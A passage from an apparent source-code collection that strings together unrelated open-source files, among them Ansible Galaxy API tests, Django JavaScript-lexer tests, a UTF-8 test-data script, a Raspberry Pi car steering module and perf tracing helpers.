actual = api.get_collection_version_metadata('namespace', 'collection', version)
assert isinstance(actual, CollectionVersionMetadata)
assert actual.namespace == u'namespace'
assert actual.name == u'collection'
assert actual.download_url == u'https://downloadme.com'
assert actual.artifact_sha256 == u'ac47b6fac117d7c171812750dacda655b04533cf56b31080b82d1c0db3c9d80f'
assert actual.version == version
assert actual.dependencies == {}
assert mock_open.call_count == 1
assert mock_open.mock_calls[0][1][0] == '%s%s/collections/namespace/collection/versions/%s/' \
% (api.api_server, api_version, version)
# v2 calls dont need auth, so no authz header or token_type
if token_type:
assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type
@pytest.mark.parametrize('api_version, token_type, token_ins, response', [
('v2', None, None, {
'count': 2,
'next': None,
'previous': None,
'results': [
{
'version': '1.0.0',
'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.0',
},
{
'version': '1.0.1',
'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.1',
},
],
}),
# TODO: Verify this once Automation Hub is actually out
('v3', 'Bearer', KeycloakToken(auth_url='https://api.test/'), {
'count': 2,
'next': None,
'previous': None,
'data': [
{
'version': '1.0.0',
'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.0',
},
{
'version': '1.0.1',
'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.1',
},
],
}),
])
def test_get_collection_versions(api_version, token_type, token_ins, response, monkeypatch):
api = get_test_galaxy_api('https://galaxy.server.com/api/', api_version, token_ins=token_ins)
if token_ins:
mock_token_get = MagicMock()
mock_token_get.return_value = 'my token'
monkeypatch.setattr(token_ins, 'get', mock_token_get)
mock_open = MagicMock()
mock_open.side_effect = [
StringIO(to_text(json.dumps(response))),
]
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
actual = api.get_collection_versions('namespace', 'collection')
assert actual == [u'1.0.0', u'1.0.1']
assert mock_open.call_count == 1
assert mock_open.mock_calls[0][1][0] == 'https://galaxy.server.com/api/%s/collections/namespace/collection/' \
'versions/' % api_version
if token_ins:
assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type
@pytest.mark.parametrize('api_version, token_type, token_ins, responses', [
('v2', None, None, [
{
'count': 6,
'next': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/?page=2',
'previous': None,
'results': [
{
'version': '1.0.0',
'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.0',
},
{
'version': '1.0.1',
'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.1',
},
],
},
{
'count': 6,
'next': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/?page=3',
'previous': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions',
'results': [
{
'version': '1.0.2',
'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.2',
},
{
'version': '1.0.3',
'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.3',
},
],
},
{
'count': 6,
'next': None,
'previous': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/?page=2',
'results': [
{
'version': '1.0.4',
'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.4',
},
{
'version': '1.0.5',
'href': 'https://galaxy.server.com/api/v2/collections/namespace/collection/versions/1.0.5',
},
],
},
]),
('v3', 'Bearer', KeycloakToken(auth_url='https://api.test/'), [
{
'count': 6,
'links': {
'next': '/api/v3/collections/namespace/collection/versions/?page=2',
'previous': None,
},
'data': [
{
'version': '1.0.0',
'href': '/api/v3/collections/namespace/collection/versions/1.0.0',
},
{
'version': '1.0.1',
'href': '/api/v3/collections/namespace/collection/versions/1.0.1',
},
],
},
{
'count': 6,
'links': {
'next': '/api/v3/collections/namespace/collection/versions/?page=3',
'previous': '/api/v3/collections/namespace/collection/versions',
},
'data': [
{
'version': '1.0.2',
'href': '/api/v3/collections/namespace/collection/versions/1.0.2',
},
{
'version': '1.0.3',
'href': '/api/v3/collections/namespace/collection/versions/1.0.3',
},
],
},
{
'count': 6,
'links': {
'next': None,
'previous': '/api/v3/collections/namespace/collection/versions/?page=2',
},
'data': [
{
'version': '1.0.4',
'href': '/api/v3/collections/namespace/collection/versions/1.0.4',
},
{
'version': '1.0.5',
'href': '/api/v3/collections/namespace/collection/versions/1.0.5',
},
],
},
]),
])
def test_get_collection_versions_pagination(api_version, token_type, token_ins, responses, monkeypatch):
api = get_test_galaxy_api('https://galaxy.server.com/api/', api_version, token_ins=token_ins)
if token_ins:
mock_token_get = MagicMock()
mock_token_get.return_value = 'my token'
monkeypatch.setattr(token_ins, 'get', mock_token_get)
mock_open = MagicMock()
mock_open.side_effect = [StringIO(to_text(json.dumps(r))) for r in responses]
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
actual = api.get_collection_versions('namespace', 'collection')
assert actual == [u'1.0.0', u'1.0.1', u'1.0.2', u'1.0.3', u'1.0.4', u'1.0.5']
assert mock_open.call_count == 3
assert mock_open.mock_calls[0][1][0] == 'https://galaxy.server.com/api/%s/collections/namespace/collection/' \
'versions/' % api_version
assert mock_open.mock_calls[1][1][0] == 'https://galaxy.server.com/api/%s/collections/namespace/collection/' \
'versions/?page=2' % api_version
assert mock_open.mock_calls[2][1][0] == 'https://galaxy.server.com/api/%s/collections/namespace/collection/' \
'versions/?page=3' % api_version
if token_type:
assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type
assert mock_open.mock_calls[1][2]['headers']['Authorization'] == '%s my token' % token_type
assert mock_open.mock_calls[2][2]['headers']['Authorization'] == '%s my token' % token_type
@pytest.mark.parametrize('responses', [
[
{
'count': 2,
'results': [{'name': '3.5.1', }, {'name': '3.5.2'}],
'next_link': None,
'next': None,
'previous_link': None,
'previous': None
},
],
[
{
'count': 2,
'results': [{'name': '3.5.1'}],
'next_link': '/api/v1/roles/432/versions/?page=2&page_size=50',
'next': '/roles/432/versions/?page=2&page_size=50',
'previous_link': None,
'previous': None
},
{
'count': 2,
'results': [{'name': '3.5.2'}],
'next_link': None,
'next': None,
'previous_link': '/api/v1/roles/432/versions/?&page_size=50',
'previous': '/roles/432/versions/?page_size=50',
},
]
])
def test_get_role_versions_pagination(monkeypatch, responses):
api = get_test_galaxy_api('https://galaxy.com/api/', 'v1')
mock_open = MagicMock()
mock_open.side_effect = [StringIO(to_text(json.dumps(r))) for r in responses]
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
actual = api.fetch_role_related('versions', 432)
assert actual == [{'name': '3.5.1'}, {'name': '3.5.2'}]
assert mock_open.call_count == len(responses)
assert mock_open.mock_calls[0][1][0] == 'https://galaxy.com/api/v1/roles/432/versions/?page_size=50'
if len(responses) == 2:
assert mock_open.mock_calls[1][1][0] == 'https://galaxy.com/api/v1/roles/432/versions/?page=2&page_size=50'
| gpl-3.0 |
squirrelo/american-gut-web | amgut/lib/test/test_util.py | 1 | 3684 | from unittest import TestCase, main
from amgut.lib.util import (survey_fermented, survey_surf, survey_vioscreen,
survey_asd, rollback)
from amgut.lib.data_access.ag_data_access import AGDataAccess
class TestUtil(TestCase):
def setUp(self):
self.ag_data = AGDataAccess()
def tearDown(self):
del self.ag_data
def test_survey_fermented(self):
obs = survey_fermented('survey_id', {'participant_name': 'test'})
exp = ('<h3 style="text-align: center"><a href="/authed/'
'secondary_survey/?type=fermented&participant_name=test" '
'target="_blank">Fermented Foods Survey</a></h3>As part of our '
'onging research into what drive changes in the human gut '
'microbiome, we are looking at fermented foods and the '
'microbiomes of fermented food eaters. Please click the link '
'above if you would like to participate in this survey.')
self.assertEqual(obs, exp)
def test_survey_surf(self):
obs = survey_surf('survey_id', {'participant_name': 'test'})
exp = ('<h3 style="text-align: center"><a href="/authed/'
'secondary_survey/?type=surf&participant_name=test" target='
'"_blank">Surfing Survey</a></h3>As part of our study, we are '
'interested in the effects of frequent and prolonged exposure '
'to salt water and the ocean, as it pertains to surfing and '
'surfers. If you are interested in participating, you can click'
' the link above and take the survey.')
self.assertEqual(obs, exp)
def test_survey_asd(self):
obs = survey_asd('survey_id', {'participant_name': 'test'})
exp = ('<h3 style="text-align: center"><a href="https://docs.google.'
'com/forms/d/1ZlaQzENj7NA7TcdfFhXfW0jshrToTywAarV0fjTZQxc/'
'viewform?entry.1089722816=survey_id&entry.1116725993&entry.'
'1983725631&entry.2036966278&entry.1785627282&entry.1461731626'
'&entry.1203990558&entry.843049551&entry.476318397&entry.'
'383297943&entry.228366248&entry.1651855735&entry.1234457826&'
'entry.1079752165" target="_blank">ASD-Cohort survey</a></h3>'
'<a href="http://www.anl.gov/contributors/jack-gilbert">Dr. '
'Jack Gilbert</a> is exploring the relationship between gut '
'dysbiosis and Autism Spectrum Disorders, and in conjunction '
'with the American Gut Project, we started an ASD-Cohort '
'study. This additional survey contains questions specific to '
'that cohort, but it is open to any participant to take if '
'they so choose.')
self.assertEqual(obs, exp)
def test_survey_vioscreen(self):
obs = survey_vioscreen('survey_id', {'participant_name': 'test'})
# Validate using in because key changes every time due to encription
self.assertIn('This is a validated FFQ, and is the one used '
'by the Mayo Clinic.', obs)
self.assertIn('<h3 style="text-align: center"><a href="'
'https://vioscreen.com/remotelogin.aspx?Key=', obs)
def test_rolback(self):
kit = 'tst_QCSKc'
@rollback
def tf(kit):
self.ag_data.verifyKit(kit)
obs = self.ag_data.getAGKitDetails(kit)
self.assertEqual(obs['kit_verified'], 'n')
tf(kit)
obs = self.ag_data.getAGKitDetails(kit)
self.assertEqual(obs['kit_verified'], 'n')
if __name__ == '__main__':
main()
| bsd-3-clause |
zhoulingjun/django | tests/utils_tests/test_jslex.py | 169 | 9708 | # -*- coding: utf-8 -*-
"""Tests for jslex."""
# originally from https://bitbucket.org/ned/jslex
from __future__ import unicode_literals
from django.test import SimpleTestCase
from django.utils.jslex import JsLexer, prepare_js_for_gettext
class JsTokensTest(SimpleTestCase):
LEX_CASES = [
# ids
("a ABC $ _ a123", ["id a", "id ABC", "id $", "id _", "id a123"]),
("\\u1234 abc\\u0020 \\u0065_\\u0067", ["id \\u1234", "id abc\\u0020", "id \\u0065_\\u0067"]),
# numbers
("123 1.234 0.123e-3 0 1E+40 1e1 .123", ["dnum 123", "dnum 1.234", "dnum 0.123e-3", "dnum 0", "dnum 1E+40", "dnum 1e1", "dnum .123"]),
("0x1 0xabCD 0XABcd", ["hnum 0x1", "hnum 0xabCD", "hnum 0XABcd"]),
("010 0377 090", ["onum 010", "onum 0377", "dnum 0", "dnum 90"]),
("0xa123ghi", ["hnum 0xa123", "id ghi"]),
# keywords
("function Function FUNCTION", ["keyword function", "id Function", "id FUNCTION"]),
("const constructor in inherits", ["keyword const", "id constructor", "keyword in", "id inherits"]),
("true true_enough", ["reserved true", "id true_enough"]),
# strings
(''' 'hello' "hello" ''', ["string 'hello'", 'string "hello"']),
(r""" 'don\'t' "don\"t" '"' "'" '\'' "\"" """,
[r"""string 'don\'t'""", r'''string "don\"t"''', r"""string '"'""", r'''string "'"''', r"""string '\''""", r'''string "\""''']),
(r'"ƃuıxǝ⅂ ʇdıɹɔsɐʌɐſ\""', [r'string "ƃuıxǝ⅂ ʇdıɹɔsɐʌɐſ\""']),
# comments
("a//b", ["id a", "linecomment //b"]),
("/****/a/=2//hello", ["comment /****/", "id a", "punct /=", "dnum 2", "linecomment //hello"]),
("/*\n * Header\n */\na=1;", ["comment /*\n * Header\n */", "id a", "punct =", "dnum 1", "punct ;"]),
# punctuation
("a+++b", ["id a", "punct ++", "punct +", "id b"]),
# regex
(r"a=/a*/,1", ["id a", "punct =", "regex /a*/", "punct ,", "dnum 1"]),
(r"a=/a*[^/]+/,1", ["id a", "punct =", "regex /a*[^/]+/", "punct ,", "dnum 1"]),
(r"a=/a*\[^/,1", ["id a", "punct =", r"regex /a*\[^/", "punct ,", "dnum 1"]),
(r"a=/\//,1", ["id a", "punct =", r"regex /\//", "punct ,", "dnum 1"]),
# next two are from http://www.mozilla.org/js/language/js20-2002-04/rationale/syntax.html#regular-expressions
("""for (var x = a in foo && "</x>" || mot ? z:/x:3;x<5;y</g/i) {xyz(x++);}""",
["keyword for", "punct (", "keyword var", "id x", "punct =", "id a", "keyword in",
"id foo", "punct &&", 'string "</x>"', "punct ||", "id mot", "punct ?", "id z",
"punct :", "regex /x:3;x<5;y</g", "punct /", "id i", "punct )", "punct {",
"id xyz", "punct (", "id x", "punct ++", "punct )", "punct ;", "punct }"]),
("""for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y</g/i) {xyz(x++);}""",
["keyword for", "punct (", "keyword var", "id x", "punct =", "id a", "keyword in",
"id foo", "punct &&", 'string "</x>"', "punct ||", "id mot", "punct ?", "id z",
"punct /", "id x", "punct :", "dnum 3", "punct ;", "id x", "punct <", "dnum 5",
"punct ;", "id y", "punct <", "regex /g/i", "punct )", "punct {",
"id xyz", "punct (", "id x", "punct ++", "punct )", "punct ;", "punct }"]),
# Various "illegal" regexes that are valid according to the std.
(r"""/????/, /++++/, /[----]/ """, ["regex /????/", "punct ,", "regex /++++/", "punct ,", "regex /[----]/"]),
# Stress cases from http://stackoverflow.com/questions/5533925/what-javascript-constructs-does-jslex-incorrectly-lex/5573409#5573409
(r"""/\[/""", [r"""regex /\[/"""]),
(r"""/[i]/""", [r"""regex /[i]/"""]),
(r"""/[\]]/""", [r"""regex /[\]]/"""]),
(r"""/a[\]]/""", [r"""regex /a[\]]/"""]),
(r"""/a[\]]b/""", [r"""regex /a[\]]b/"""]),
(r"""/[\]/]/gi""", [r"""regex /[\]/]/gi"""]),
(r"""/\[[^\]]+\]/gi""", [r"""regex /\[[^\]]+\]/gi"""]),
("""
rexl.re = {
NAME: /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/,
UNQUOTED_LITERAL: /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/,
QUOTED_LITERAL: /^'(?:[^']|'')*'/,
NUMERIC_LITERAL: /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/,
SYMBOL: /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/
};
""",
["id rexl", "punct .", "id re", "punct =", "punct {",
"id NAME", "punct :", r"""regex /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/""", "punct ,",
"id UNQUOTED_LITERAL", "punct :", r"""regex /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/""", "punct ,",
"id QUOTED_LITERAL", "punct :", r"""regex /^'(?:[^']|'')*'/""", "punct ,",
"id NUMERIC_LITERAL", "punct :", r"""regex /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/""", "punct ,",
"id SYMBOL", "punct :", r"""regex /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/""",
"punct }", "punct ;"
]),
("""
rexl.re = {
NAME: /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/,
UNQUOTED_LITERAL: /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/,
QUOTED_LITERAL: /^'(?:[^']|'')*'/,
NUMERIC_LITERAL: /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/,
SYMBOL: /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/
};
str = '"';
""",
["id rexl", "punct .", "id re", "punct =", "punct {",
"id NAME", "punct :", r"""regex /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/""", "punct ,",
"id UNQUOTED_LITERAL", "punct :", r"""regex /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/""", "punct ,",
"id QUOTED_LITERAL", "punct :", r"""regex /^'(?:[^']|'')*'/""", "punct ,",
"id NUMERIC_LITERAL", "punct :", r"""regex /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/""", "punct ,",
"id SYMBOL", "punct :", r"""regex /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/""",
"punct }", "punct ;",
"id str", "punct =", """string '"'""", "punct ;",
]),
(r""" this._js = "e.str(\"" + this.value.replace(/\\/g, "\\\\").replace(/"/g, "\\\"") + "\")"; """,
["keyword this", "punct .", "id _js", "punct =", r'''string "e.str(\""''', "punct +", "keyword this", "punct .",
"id value", "punct .", "id replace", "punct (", r"regex /\\/g", "punct ,", r'string "\\\\"', "punct )",
"punct .", "id replace", "punct (", r'regex /"/g', "punct ,", r'string "\\\""', "punct )", "punct +",
r'string "\")"', "punct ;"]),
]
def make_function(input, toks):
def test_func(self):
lexer = JsLexer()
result = ["%s %s" % (name, tok) for name, tok in lexer.lex(input) if name != 'ws']
self.assertListEqual(result, toks)
return test_func
for i, (input, toks) in enumerate(JsTokensTest.LEX_CASES):
setattr(JsTokensTest, "test_case_%d" % i, make_function(input, toks))
GETTEXT_CASES = (
(
r"""
a = 1; /* /[0-9]+/ */
b = 0x2a0b / 1; // /[0-9]+/
c = 3;
""",
r"""
a = 1; /* /[0-9]+/ */
b = 0x2a0b / 1; // /[0-9]+/
c = 3;
"""
), (
r"""
a = 1.234e-5;
/*
* /[0-9+/
*/
b = .0123;
""",
r"""
a = 1.234e-5;
/*
* /[0-9+/
*/
b = .0123;
"""
), (
r"""
x = y / z;
alert(gettext("hello"));
x /= 3;
""",
r"""
x = y / z;
alert(gettext("hello"));
x /= 3;
"""
), (
r"""
s = "Hello \"th/foo/ere\"";
s = 'He\x23llo \'th/foo/ere\'';
s = 'slash quote \", just quote "';
""",
r"""
s = "Hello \"th/foo/ere\"";
s = "He\x23llo \'th/foo/ere\'";
s = "slash quote \", just quote \"";
"""
), (
r"""
s = "Line continuation\
continued /hello/ still the string";/hello/;
""",
r"""
s = "Line continuation\
continued /hello/ still the string";"REGEX";
"""
), (
r"""
var regex = /pattern/;
var regex2 = /matter/gm;
var regex3 = /[*/]+/gm.foo("hey");
""",
r"""
var regex = "REGEX";
var regex2 = "REGEX";
var regex3 = "REGEX".foo("hey");
"""
), (
r"""
for (var x = a in foo && "</x>" || mot ? z:/x:3;x<5;y</g/i) {xyz(x++);}
for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y</g/i) {xyz(x++);}
""",
r"""
for (var x = a in foo && "</x>" || mot ? z:"REGEX"/i) {xyz(x++);}
for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y<"REGEX") {xyz(x++);}
"""
), (
"""
\\u1234xyz = gettext('Hello there');
""", r"""
Uu1234xyz = gettext("Hello there");
"""
)
)
class JsToCForGettextTest(SimpleTestCase):
pass
def make_function(js, c):
def test_func(self):
self.assertMultiLineEqual(prepare_js_for_gettext(js), c)
return test_func
for i, pair in enumerate(GETTEXT_CASES):
setattr(JsToCForGettextTest, "test_case_%d" % i, make_function(*pair))
| bsd-3-clause |
yashoswal/Node-HTTP-proxy-server | node_modules/socket.io/node_modules/socket.io-client/node_modules/engine.io-client/node_modules/engine.io-parser/node_modules/utf8/tests/generate-test-data.py | 2214 | 1347 | #!/usr/bin/env python
import re
import json
# http://mathiasbynens.be/notes/javascript-encoding#surrogate-formulae
# http://stackoverflow.com/a/13436167/96656
def unisymbol(codePoint):
if codePoint >= 0x0000 and codePoint <= 0xFFFF:
return unichr(codePoint)
elif codePoint >= 0x010000 and codePoint <= 0x10FFFF:
highSurrogate = int((codePoint - 0x10000) / 0x400) + 0xD800
lowSurrogate = int((codePoint - 0x10000) % 0x400) + 0xDC00
return unichr(highSurrogate) + unichr(lowSurrogate)
else:
return 'Error'
def hexify(codePoint):
return 'U+' + hex(codePoint)[2:].upper().zfill(6)
def writeFile(filename, contents):
print filename
with open(filename, 'w') as f:
f.write(contents.strip() + '\n')
data = []
for codePoint in range(0x000000, 0x10FFFF + 1):
symbol = unisymbol(codePoint)
# http://stackoverflow.com/a/17199950/96656
bytes = symbol.encode('utf8').decode('latin1')
data.append({
'codePoint': codePoint,
'decoded': symbol,
'encoded': bytes
});
jsonData = json.dumps(data, sort_keys=False, indent=2, separators=(',', ': '))
# Use tabs instead of double spaces for indentation
jsonData = jsonData.replace(' ', '\t')
# Escape hexadecimal digits in escape sequences
jsonData = re.sub(
r'\\u([a-fA-F0-9]{4})',
lambda match: r'\u{}'.format(match.group(1).upper()),
jsonData
)
writeFile('data.json', jsonData)
| mit |
sunfounder/SunFounder_PiCar | picar/front_wheels.py | 1 | 5167 | #!/usr/bin/env python
'''
**********************************************************************
* Filename : front_wheels
* Description : A module to control the front wheels of RPi Car
* Author : Cavon
* Brand : SunFounder
* E-mail : service@sunfounder.com
* Website : www.sunfounder.com
* Update : Cavon 2016-09-13 New release
* Cavon 2016-11-04 fix for submodules
**********************************************************************
'''
from .SunFounder_PCA9685 import Servo
from .import filedb
class Front_Wheels(object):
''' Front wheels control class '''
FRONT_WHEEL_CHANNEL = 0
_DEBUG = False
_DEBUG_INFO = 'DEBUG "front_wheels.py":'
def __init__(self, debug=False, db="config", bus_number=1, channel=FRONT_WHEEL_CHANNEL):
''' setup channels and basic stuff '''
self.db = filedb.fileDB(db=db)
self._channel = channel
self._straight_angle = 90
self.turning_max = 45
self._turning_offset = int(self.db.get('turning_offset', default_value=0))
self.wheel = Servo.Servo(self._channel, bus_number=bus_number, offset=self.turning_offset)
self.debug = debug
self._debug_('Front wheel PWM channel: %s' % self._channel)
self._debug_('Front wheel offset value: %s ' % self.turning_offset)
self._angle = {"left":self._min_angle, "straight":self._straight_angle, "right":self._max_angle}
self._debug_('left angle: %s, straight angle: %s, right angle: %s' % (self._angle["left"], self._angle["straight"], self._angle["right"]))
def _debug_(self,message):
if self._DEBUG:
print(self._DEBUG_INFO,message)
def turn_left(self):
''' Turn the front wheels left '''
self._debug_("Turn left")
self.wheel.write(self._angle["left"])
def turn_straight(self):
''' Turn the front wheels back straight '''
self._debug_("Turn straight")
self.wheel.write(self._angle["straight"])
def turn_right(self):
''' Turn the front wheels right '''
self._debug_("Turn right")
self.wheel.write(self._angle["right"])
def turn(self, angle):
''' Turn the front wheels to the giving angle '''
self._debug_("Turn to %s " % angle)
if angle < self._angle["left"]:
angle = self._angle["left"]
if angle > self._angle["right"]:
angle = self._angle["right"]
self.wheel.write(angle)
@property
def channel(self):
return self._channel
@channel.setter
def channel(self, chn):
self._channel = chn
@property
def turning_max(self):
return self._turning_max
@turning_max.setter
def turning_max(self, angle):
self._turning_max = angle
self._min_angle = self._straight_angle - angle
self._max_angle = self._straight_angle + angle
self._angle = {"left":self._min_angle, "straight":self._straight_angle, "right":self._max_angle}
@property
def turning_offset(self):
return self._turning_offset
@turning_offset.setter
def turning_offset(self, value):
if not isinstance(value, int):
raise TypeError('"turning_offset" must be "int"')
self._turning_offset = value
self.db.set('turning_offset', value)
self.wheel.offset = value
self.turn_straight()
@property
def debug(self):
return self._DEBUG
@debug.setter
def debug(self, debug):
''' Set if debug information shows '''
if debug in (True, False):
self._DEBUG = debug
else:
raise ValueError('debug must be "True" (Set debug on) or "False" (Set debug off), not "{0}"'.format(debug))
if self._DEBUG:
print(self._DEBUG_INFO, "Set debug on")
print(self._DEBUG_INFO, "Set wheel debug on")
self.wheel.debug = True
else:
print(self._DEBUG_INFO, "Set debug off")
print(self._DEBUG_INFO, "Set wheel debug off")
self.wheel.debug = False
def ready(self):
''' Get the front wheels to the ready position. '''
self._debug_('Turn to "Ready" position')
self.wheel.offset = self.turning_offset
self.turn_straight()
def calibration(self):
''' Get the front wheels to the calibration position. '''
self._debug_('Turn to "Calibration" position')
self.turn_straight()
self.cali_turning_offset = self.turning_offset
def cali_left(self):
''' Calibrate the wheels to left '''
self.cali_turning_offset -= 1
self.wheel.offset = self.cali_turning_offset
self.turn_straight()
def cali_right(self):
''' Calibrate the wheels to right '''
self.cali_turning_offset += 1
self.wheel.offset = self.cali_turning_offset
self.turn_straight()
def cali_ok(self):
''' Save the calibration value '''
self.turning_offset = self.cali_turning_offset
self.db.set('turning_offset', self.turning_offset)
def test(chn=0):
import time
front_wheels = Front_Wheels(channel=chn)
try:
while True:
print("turn_left")
front_wheels.turn_left()
time.sleep(1)
print("turn_straight")
front_wheels.turn_straight()
time.sleep(1)
print("turn_right")
front_wheels.turn_right()
time.sleep(1)
print("turn_straight")
front_wheels.turn_straight()
time.sleep(1)
except KeyboardInterrupt:
front_wheels.turn_straight()
if __name__ == '__main__':
test()
| gpl-2.0 |
thewisenerd/android_kernel_xiaomi_armani | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Core.py | 11088 | 3246 | # Core.py - Python extension for perf script, core functions
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
from collections import defaultdict
def autodict():
return defaultdict(autodict)
flag_fields = autodict()
symbolic_fields = autodict()
def define_flag_field(event_name, field_name, delim):
flag_fields[event_name][field_name]['delim'] = delim
def define_flag_value(event_name, field_name, value, field_str):
flag_fields[event_name][field_name]['values'][value] = field_str
def define_symbolic_field(event_name, field_name):
# nothing to do, really
pass
def define_symbolic_value(event_name, field_name, value, field_str):
symbolic_fields[event_name][field_name]['values'][value] = field_str
def flag_str(event_name, field_name, value):
string = ""
if flag_fields[event_name][field_name]:
print_delim = 0
keys = flag_fields[event_name][field_name]['values'].keys()
keys.sort()
for idx in keys:
if not value and not idx:
string += flag_fields[event_name][field_name]['values'][idx]
break
if idx and (value & idx) == idx:
if print_delim and flag_fields[event_name][field_name]['delim']:
string += " " + flag_fields[event_name][field_name]['delim'] + " "
string += flag_fields[event_name][field_name]['values'][idx]
print_delim = 1
value &= ~idx
return string
def symbol_str(event_name, field_name, value):
string = ""
if symbolic_fields[event_name][field_name]:
keys = symbolic_fields[event_name][field_name]['values'].keys()
keys.sort()
for idx in keys:
if not value and not idx:
string = symbolic_fields[event_name][field_name]['values'][idx]
break
if (value == idx):
string = symbolic_fields[event_name][field_name]['values'][idx]
break
return string
trace_flags = { 0x00: "NONE", \
0x01: "IRQS_OFF", \
0x02: "IRQS_NOSUPPORT", \
0x04: "NEED_RESCHED", \
0x08: "HARDIRQ", \
0x10: "SOFTIRQ" }
def trace_flag_str(value):
string = ""
print_delim = 0
keys = trace_flags.keys()
for idx in keys:
if not value and not idx:
string += "NONE"
break
if idx and (value & idx) == idx:
if print_delim:
string += " | ";
string += trace_flags[idx]
print_delim = 1
value &= ~idx
return string
def taskState(state):
states = {
0 : "R",
1 : "S",
2 : "D",
64: "DEAD"
}
if state not in states:
return "Unknown"
return states[state]
class EventHeaders:
def __init__(self, common_cpu, common_secs, common_nsecs,
common_pid, common_comm):
self.cpu = common_cpu
self.secs = common_secs
self.nsecs = common_nsecs
self.pid = common_pid
self.comm = common_comm
def ts(self):
return (self.secs * (10 ** 9)) + self.nsecs
def ts_format(self):
return "%d.%d" % (self.secs, int(self.nsecs / 1000))
| gpl-2.0 |
XcomConvent/xcom40k-shades | xcom40k/app/tests.py | 1 | 1385 | from django.test import TestCase
# Create your tests here.
import datetime
from django.shortcuts import render, get_object_or_404
from django.template import loader
from django.core.urlresolvers import reverse
from django.views import generic
from django.contrib.auth import views, logout
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth.forms import AuthenticationForm
from django.http import HttpResponse, HttpResponseRedirect, Http404, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseServerError
import logging
from django.utils import timezone
from .forms import *
from .models import *
from xcom40k.settings import BUILD_NAME, BUILD_VERSION
from . import models,views,forms,urls
class QuestionViewTests(TestCase):
# a following sample IS TO BE FOLLOWED STRICTLY:
# #####
#def test_<some verbose name> (self):
#''' COMPONENTS: <name of components being tested>
# ABOUT: <a broad explanation of the test's purpose>
# EXPECTED: <an expected result>
#'''
# <code>
# #####
# The following example should be self-explanatory:
def test_try_to_ping(self):
""" COMPONENT: app:*
ABOUT: Tries to ping up the server.
EXPECTED: A '200 OK' response should be received from the server
"""
self.assertEqual(self.client.get(reverse('app:index')).status_code, 200)
| apache-2.0 |
lucasdemarchi/ardupilot | mk/VRBRAIN/Tools/genmsg/src/genmsg/template_tools.py | 51 | 9659 | # Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
